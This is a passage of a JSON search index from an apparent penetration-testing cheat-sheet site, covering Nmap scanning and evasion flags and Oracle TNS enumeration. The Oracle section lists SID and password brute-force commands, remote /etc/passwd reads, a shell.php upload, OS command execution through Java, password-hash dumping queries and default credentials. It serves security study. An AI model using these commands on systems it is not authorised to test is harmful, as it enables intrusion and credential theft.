plugins\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"output\"\u003eOutput\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enikto -h https://target.tld -o report.html -Format htm\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enikto -h \u0026lt;ip\u0026gt; -o nikto.json -Format json\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enikto -h \u0026lt;ip\u0026gt; -o nikto.xml  -Format xml\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enikto -h \u0026lt;ip\u0026gt; -o nikto.csv  -Format 
csv\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\u003ccode\u003e-Display\u003c/code\u003e flags (combine, e.g. \u003ccode\u003e-Display 1V\u003c/code\u003e):\u003c/p\u003e","title":"nikto"},{"content":"Nmap Cheatsheet Default Ports: N/A (scanner tool)\nScan Types Flag Description -sS SYN scan (stealth, default with root) -sT TCP connect scan (no root needed) -sU UDP scan -sV Service/version detection -sC Default scripts -sA ACK scan (firewall mapping) -sN NULL scan -sF FIN scan -sX Xmas scan -sn Ping sweep (no port scan) -O OS detection -A Aggressive (OS + version + scripts + traceroute) Port Specification nmap -p 22 # Single port nmap -p 22,80,443 # Multiple ports nmap -p 1-1024 # Port range nmap -p- # All 65535 ports nmap --top-ports 1000 # Top 1000 ports nmap -F # Fast scan (top 100) Timing Templates Flag Name Description -T0 Paranoid IDS evasion, very slow -T1 Sneaky Slow, IDS evasion -T2 Polite Slower, less bandwidth -T3 Normal Default -T4 Aggressive Faster, reliable network -T5 Insane Very fast, may miss results Output Formats nmap -oN output.txt # Normal output nmap -oX output.xml # XML output nmap -oG output.gnmap # Grepable output nmap -oA output # All formats at once Host Discovery nmap -sn 192.168.1.0/24 # Ping sweep nmap -PS22,80,443 192.168.1.0/24 # TCP SYN ping nmap -PA80 192.168.1.0/24 # TCP ACK ping nmap -PU53 192.168.1.0/24 # UDP ping nmap -PE 192.168.1.0/24 # ICMP echo ping nmap --disable-arp-ping 192.168.1.1 # Skip ARP discovery Evasion \u0026amp; Spoofing nmap -D RND:5 \u0026lt;target\u0026gt; # Decoy scan (5 random decoys) nmap -D decoy1,decoy2 \u0026lt;target\u0026gt; # Named decoys nmap -S \u0026lt;spoof-ip\u0026gt; \u0026lt;target\u0026gt; # Spoof source IP nmap --spoof-mac 0 \u0026lt;target\u0026gt; # Random MAC spoof nmap -f \u0026lt;target\u0026gt; # Fragment packets nmap --mtu 24 \u0026lt;target\u0026gt; # Custom MTU (must be multiple of 8) nmap --data-length 25 
\u0026lt;target\u0026gt; # Append random data to packets nmap --scan-delay 5s \u0026lt;target\u0026gt; # Delay between probes nmap -sI \u0026lt;zombie\u0026gt; \u0026lt;target\u0026gt; # Idle/zombie scan nmap --proxies socks4://host:port # Route through proxy NSE Scripts nmap --script=\u0026lt;name\u0026gt; \u0026lt;target\u0026gt; # Run specific script nmap --script=\u0026lt;category\u0026gt; \u0026lt;target\u0026gt; # Run entire category nmap --script-help=\u0026lt;name\u0026gt; # Get help for a script nmap --script-updatedb # Update script database # Script categories: # auth, broadcast, brute, default, discovery, # dos, exploit, external, fuzzer, intrusive, # malware, safe, version, vuln Common Scan Combos # Quick full port scan nmap -p- --min-rate 5000 -T4 \u0026lt;target\u0026gt; # Detailed enum after port discovery nmap -p \u0026lt;ports\u0026gt; -sV -sC -O \u0026lt;target\u0026gt; # Aggressive all-in-one nmap -A -p- \u0026lt;target\u0026gt; # Stealth SYN + version detection nmap -sS -sV -p- -T4 \u0026lt;target\u0026gt; # UDP top ports nmap -sU --top-ports 100 \u0026lt;target\u0026gt; # Vulnerability scan nmap --script vuln \u0026lt;target\u0026gt; # Banner grabbing nmap -sV --script banner \u0026lt;target\u0026gt; ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/footprinting/nmap/","summary":"\u003ch1 id=\"nmap-cheatsheet\"\u003eNmap Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eDefault Ports:\u003c/strong\u003e N/A (scanner tool)\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"scan-types\"\u003eScan Types\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eFlag\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-sS\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSYN scan (stealth, default with 
root)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-sT\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eTCP connect scan (no root needed)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-sU\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eUDP scan\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-sV\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eService/version detection\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-sC\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eDefault scripts\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-sA\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eACK scan (firewall mapping)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-sN\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eNULL scan\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-sF\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eFIN scan\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-sX\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eXmas scan\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-sn\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003ePing sweep (no port scan)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-O\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eOS detection\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-A\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eAggressive (OS + version + 
scripts + traceroute)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"port-specification\"\u003ePort Specification\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e22\u003c/span\u003e               \u003cspan style=\"color:#75715e\"\u003e# Single port\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p 22,80,443        \u003cspan style=\"color:#75715e\"\u003e# Multiple ports\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p 1-1024           \u003cspan style=\"color:#75715e\"\u003e# Port range\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p-                 \u003cspan style=\"color:#75715e\"\u003e# All 65535 ports\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap --top-ports \u003cspan style=\"color:#ae81ff\"\u003e1000\u003c/span\u003e    \u003cspan style=\"color:#75715e\"\u003e# Top 1000 ports\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -F                  \u003cspan style=\"color:#75715e\"\u003e# Fast scan (top 100)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"timing-templates\"\u003eTiming 
Templates\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eFlag\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eName\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-T0\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eParanoid\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eIDS evasion, very slow\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-T1\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSneaky\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSlow, IDS evasion\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-T2\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003ePolite\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSlower, less bandwidth\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-T3\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eNormal\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eDefault\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-T4\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eAggressive\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eFaster, reliable network\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-T5\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eInsane\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eVery fast, may miss results\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"output-formats\"\u003eOutput Formats\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" 
style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -oN output.txt      \u003cspan style=\"color:#75715e\"\u003e# Normal output\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -oX output.xml      \u003cspan style=\"color:#75715e\"\u003e# XML output\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -oG output.gnmap    \u003cspan style=\"color:#75715e\"\u003e# Grepable output\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -oA output          \u003cspan style=\"color:#75715e\"\u003e# All formats at once\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"host-discovery\"\u003eHost Discovery\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -sn 192.168.1.0/24               \u003cspan style=\"color:#75715e\"\u003e# Ping sweep\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -PS22,80,443 192.168.1.0/24      \u003cspan style=\"color:#75715e\"\u003e# TCP SYN ping\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -PA80 192.168.1.0/24             \u003cspan style=\"color:#75715e\"\u003e# TCP ACK ping\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -PU53 
192.168.1.0/24             \u003cspan style=\"color:#75715e\"\u003e# UDP ping\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -PE 192.168.1.0/24               \u003cspan style=\"color:#75715e\"\u003e# ICMP echo ping\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap --disable-arp-ping 192.168.1.1   \u003cspan style=\"color:#75715e\"\u003e# Skip ARP discovery\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"evasion--spoofing\"\u003eEvasion \u0026amp; Spoofing\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -D RND:5 \u0026lt;target\u0026gt;              \u003cspan style=\"color:#75715e\"\u003e# Decoy scan (5 random decoys)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -D decoy1,decoy2 \u0026lt;target\u0026gt;      \u003cspan style=\"color:#75715e\"\u003e# Named decoys\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -S \u0026lt;spoof-ip\u0026gt; \u0026lt;target\u0026gt;         \u003cspan style=\"color:#75715e\"\u003e# Spoof source IP\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap --spoof-mac \u003cspan style=\"color:#ae81ff\"\u003e0\u003c/span\u003e \u0026lt;target\u0026gt;         \u003cspan style=\"color:#75715e\"\u003e# Random MAC spoof\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -f \u0026lt;target\u0026gt;                    
\u003cspan style=\"color:#75715e\"\u003e# Fragment packets\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap --mtu \u003cspan style=\"color:#ae81ff\"\u003e24\u003c/span\u003e \u0026lt;target\u0026gt;              \u003cspan style=\"color:#75715e\"\u003e# Custom MTU (must be multiple of 8)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap --data-length \u003cspan style=\"color:#ae81ff\"\u003e25\u003c/span\u003e \u0026lt;target\u0026gt;      \u003cspan style=\"color:#75715e\"\u003e# Append random data to packets\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap --scan-delay 5s \u0026lt;target\u0026gt;       \u003cspan style=\"color:#75715e\"\u003e# Delay between probes\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -sI \u0026lt;zombie\u0026gt; \u0026lt;target\u0026gt;          \u003cspan style=\"color:#75715e\"\u003e# Idle/zombie scan\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap --proxies socks4://host:port   \u003cspan style=\"color:#75715e\"\u003e# Route through proxy\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"nse-scripts\"\u003eNSE Scripts\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap --script\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003e\u0026lt;name\u0026gt; \u0026lt;target\u0026gt;              \u003cspan style=\"color:#75715e\"\u003e# Run specific 
script\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap --script\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003e\u0026lt;category\u0026gt; \u0026lt;target\u0026gt;          \u003cspan style=\"color:#75715e\"\u003e# Run entire category\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap --script-help\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003e\u0026lt;name\u0026gt;                  \u003cspan style=\"color:#75715e\"\u003e# Get help for a script\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap --script-updatedb                     \u003cspan style=\"color:#75715e\"\u003e# Update script database\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Script categories:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# auth, broadcast, brute, default, discovery,\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# dos, exploit, external, fuzzer, intrusive,\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# malware, safe, version, vuln\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"common-scan-combos\"\u003eCommon Scan Combos\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" 
style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Quick full port scan\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p- --min-rate \u003cspan style=\"color:#ae81ff\"\u003e5000\u003c/span\u003e -T4 \u0026lt;target\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Detailed enum after port discovery\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u0026lt;ports\u0026gt; -sV -sC -O \u0026lt;target\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Aggressive all-in-one\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -A -p- \u0026lt;target\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Stealth SYN + version detection\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -sS -sV -p- -T4 \u0026lt;target\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# UDP top 
ports\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -sU --top-ports \u003cspan style=\"color:#ae81ff\"\u003e100\u003c/span\u003e \u0026lt;target\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Vulnerability scan\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap --script vuln \u0026lt;target\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Banner grabbing\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -sV --script banner \u0026lt;target\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e","title":"Nmap"},{"content":"Oracle TNS Enumeration Cheatsheet Default Port: 1521 (TCP)\nNmap Scripts nmap -p 1521 --script oracle-tns-version \u0026lt;ip\u0026gt; nmap -p 1521 --script oracle-sid-brute \u0026lt;ip\u0026gt; nmap -p 1521 --script oracle-brute \u0026lt;ip\u0026gt; nmap -p 1521 --script oracle-brute-stealth \u0026lt;ip\u0026gt; nmap -p 1521 --script oracle-enum-users \\ --script-args oracle-enum-users.sid=\u0026lt;sid\u0026gt; \u0026lt;ip\u0026gt; ODAT (Oracle Database Attacking Tool) # Full automated scan odat all -s \u0026lt;ip\u0026gt; -p 1521 # SID brute force odat sidguesser -s \u0026lt;ip\u0026gt; -p 1521 # Password brute force (after getting SID) odat passwordguesser -s \u0026lt;ip\u0026gt; -p 1521 -d \u0026lt;sid\u0026gt; # File read/write (requires UTL_FILE privilege) odat utlfile -s \u0026lt;ip\u0026gt; -d \u0026lt;sid\u0026gt; -U \u0026lt;user\u0026gt; -P 
\u0026lt;pass\u0026gt; --getFile /etc passwd /tmp/passwd.txt odat utlfile -s \u0026lt;ip\u0026gt; -d \u0026lt;sid\u0026gt; -U \u0026lt;user\u0026gt; -P \u0026lt;pass\u0026gt; --putFile /tmp shell.php shell.php # OS command execution (requires Java) odat java -s \u0026lt;ip\u0026gt; -d \u0026lt;sid\u0026gt; -U \u0026lt;user\u0026gt; -P \u0026lt;pass\u0026gt; --exec \u0026#34;whoami\u0026#34; # External table method for file read (args: remote dir, remote file, local file) odat externaltable -s \u0026lt;ip\u0026gt; -d \u0026lt;sid\u0026gt; -U \u0026lt;user\u0026gt; -P \u0026lt;pass\u0026gt; --getFile /etc passwd /tmp/passwd.txt sqlplus (Direct Connection) # Install: sudo apt install oracle-instantclient-sqlplus # Connect sqlplus \u0026lt;user\u0026gt;/\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt;:\u0026lt;port\u0026gt;/\u0026lt;sid\u0026gt; sqlplus \u0026lt;user\u0026gt;/\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt;:\u0026lt;port\u0026gt;/\u0026lt;sid\u0026gt; as sysdba sqlplus \u0026lt;user\u0026gt;/\u0026lt;pass\u0026gt;@//\u0026lt;ip\u0026gt;:\u0026lt;port\u0026gt;/\u0026lt;service_name\u0026gt; Common SIDs to Try XE ORCL DB DATABASE PROD TEST DEV ORACLE OEMREP ORACLR_CONNECTION_DATA Enumeration Queries (Once Connected) -- Version and user SELECT * FROM v$version; SELECT user FROM dual; SELECT * FROM session_privs; -- Database objects SELECT * FROM all_tables; SELECT owner, table_name FROM all_tables WHERE owner != \u0026#39;SYS\u0026#39;; SELECT column_name, data_type FROM all_tab_columns WHERE table_name = \u0026#39;\u0026lt;TABLE\u0026gt;\u0026#39;; -- Users and privileges SELECT username FROM dba_users; SELECT * FROM user_role_privs; SELECT * FROM dba_sys_privs WHERE grantee = \u0026#39;\u0026lt;user\u0026gt;\u0026#39;; -- Password hashes (as SYSDBA) SELECT name, password FROM sys.user$; SELECT name, spare4 FROM sys.user$; -- S: SHA-1 (11g+) and T: SHA-512 (12c+) hashes -- Check for DBA role SELECT * FROM user_role_privs WHERE granted_role = \u0026#39;DBA\u0026#39;; Privilege Escalation via Java -- Grant Java permissions (as DBA) EXEC 
dbms_java.grant_permission(\u0026#39;SCOTT\u0026#39;, \u0026#39;SYS:java.io.FilePermission\u0026#39;, \u0026#39;\u0026lt;\u0026lt;ALL FILES\u0026gt;\u0026gt;\u0026#39;, \u0026#39;execute\u0026#39;); EXEC dbms_java.grant_permission(\u0026#39;SCOTT\u0026#39;, \u0026#39;SYS:java.lang.RuntimePermission\u0026#39;, \u0026#39;writeFileDescriptor\u0026#39;, \u0026#39;\u0026#39;); EXEC dbms_java.grant_permission(\u0026#39;SCOTT\u0026#39;, \u0026#39;SYS:java.lang.RuntimePermission\u0026#39;, \u0026#39;readFileDescriptor\u0026#39;, \u0026#39;\u0026#39;); -- Execute OS command via Java SELECT dbms_java.runjava(\u0026#39;oracle/aurora/util/Wrapper /bin/bash -c \u0026#34;id \u0026gt; /tmp/out\u0026#34;\u0026#39;) FROM dual; Brute Force hydra -l \u0026lt;user\u0026gt; -P wordlist.txt -s 1521 oracle://\u0026lt;ip\u0026gt;/\u0026lt;sid\u0026gt; nmap -p 1521 --script oracle-brute \\ --script-args oracle-brute.sid=\u0026lt;sid\u0026gt; \u0026lt;ip\u0026gt; Default Credentials Username Password Notes sys change_on_install sysdba system manager scott tiger Classic demo user dbsnmp dbsnmp SNMP agent mdsys mdsys hr hr ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/footprinting/oracle-tns/","summary":"\u003ch1 id=\"oracle-tns-enumeration-cheatsheet\"\u003eOracle TNS Enumeration Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eDefault Port:\u003c/strong\u003e 1521 (TCP)\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 